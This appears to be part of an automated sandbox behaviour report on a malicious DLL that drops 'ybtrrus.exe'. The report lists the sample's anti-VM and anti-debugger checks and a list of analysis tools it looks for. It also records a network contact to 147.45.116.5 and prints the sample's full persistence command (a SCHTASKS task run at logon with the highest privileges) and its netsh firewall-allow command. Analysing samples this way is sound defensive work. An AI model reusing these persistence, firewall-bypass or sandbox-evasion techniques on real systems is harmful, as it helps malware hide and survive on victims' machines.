Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Source: C:\iDQiPwFWUp\ybtrrus.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Battery
Source: C:\pnVcakKiqh\ybtrrus.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Battery

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: PROCMON.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: ybtrrus.exe	Binary or memory string: JOEBOXSERVER.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: OLLYDBG.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: X64DBG.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: REGMON.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: WINDBG.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: AUTORUNS.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: IMPORTREC.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: PETOOLS.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: FIDDLER.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: SNIFF_HIT.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: PROC_ANALYZER.EXE
Source: ybtrrus.exe	Binary or memory string: JOEBOXCONTROL.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: SYSANALYZER.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: IDAQ.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: DUMPCAP.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: WIRESHARK.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: FILEMON.EXE

Found evasive API chain checking for process token information

Source: C:\iDQiPwFWUp\ybtrrus.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.6 %
Source: C:\iDQiPwFWUp\ybtrrus.exe	API coverage: 5.5 %

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\iDQiPwFWUp\ybtrrus.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\pnVcakKiqh\ybtrrus.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C831F00 CloseHandle,memset,FindFirstFileW,FindClose,	12_2_6C831F00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8316F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,	12_2_6C8316F0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE4C2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,	28_2_6FE4C2D0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0545FB74 FindFirstFileW,FindClose,	28_2_0545FB74
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0545F590 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	28_2_0545F590
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05467CC6 FindFirstFileW,	28_2_05467CC6

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05467DCE GetLogicalDriveStringsW,

28_2_05467DCE

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C81EE1C GetSystemInfo,CreateFileMappingW,MapViewOfFile,VirtualAlloc,VirtualFree,UnmapViewOfFile,CloseHandle,CloseHandle,

12_2_6C81EE1C

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_5080fa819e61b36dbd2b7e7e74bdf5c819fed0_7522e4b5_75dffb69-1a82-4980-a5db-ce9131bf24b7\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fcdd551db92618d3725e94eeb7507dfc72111acd_7522e4b5_17fea6c8-cf23-47b2-9980-606d9795cdc0\	Jump to behavior

Source: ybtrrus.exe, 0000002F.00000002.2123620807.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}J
Source: ybtrrus.exe, 0000002F.00000002.2123620807.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P@
Source: ybtrrus.exe, 0000002F.00000002.2123620807.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOy6B
Source: rundll32.exe, 0000000C.00000003.1660572027.000000000311E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1660600474.000000000311F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1879646428.0000000003120000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1879973902.0000000003120000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1907789649.0000000003120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: rundll32.exe, 00000013.00000003.1712424926.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1712264584.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1962392544.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1705368888.000000000305F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1933713755.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1705289741.000000000305E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: ybtrrus.exe, 0000001C.00000002.2650636704.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: ybtrrus.exe, 0000002F.00000002.2123620807.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0101a.zip.12.dr	Binary or memory string: x3HgFs
Source: ybtrrus.exe, 00000021.00000002.2650668938.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: 4HGFs

Source: C:\iDQiPwFWUp\ybtrrus.exe

API call chain: ExitProcess graph end node

Source: C:\iDQiPwFWUp\ybtrrus.exe

Process information queried: ProcessInformation

Checks if the current process is being debugged

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process queried: DebugPort

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C85599F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_6C85599F

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C6927E0 DllMain,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

12_2_6C6927E0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C85BA00 GetProcessHeap,HeapAlloc,

12_2_6C85BA00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C85599F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_6C85599F
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE59D73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	28_2_6FE59D73
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE613E1 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	28_2_6FE613E1
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE5F0D4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	28_2_6FE5F0D4

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 147.45.116.5 80

Jump to behavior

Contains functionality to launch a program with higher privileges

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05D5F500 ShellExecuteW,

28_2_05D5F500

Contains functionality to simulate keystroke presses

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468F7E keybd_event,

28_2_05468F7E

Contains functionality to simulate mouse events

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468F86 mouse_event,

28_2_05468F86

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\iDQiPwFWUp\ybtrrus.exe "C:\iDQiPwFWUp\ybtrrus.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\pnVcakKiqh\ybtrrus.exe "C:\pnVcakKiqh\ybtrrus.exe"	Jump to behavior
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
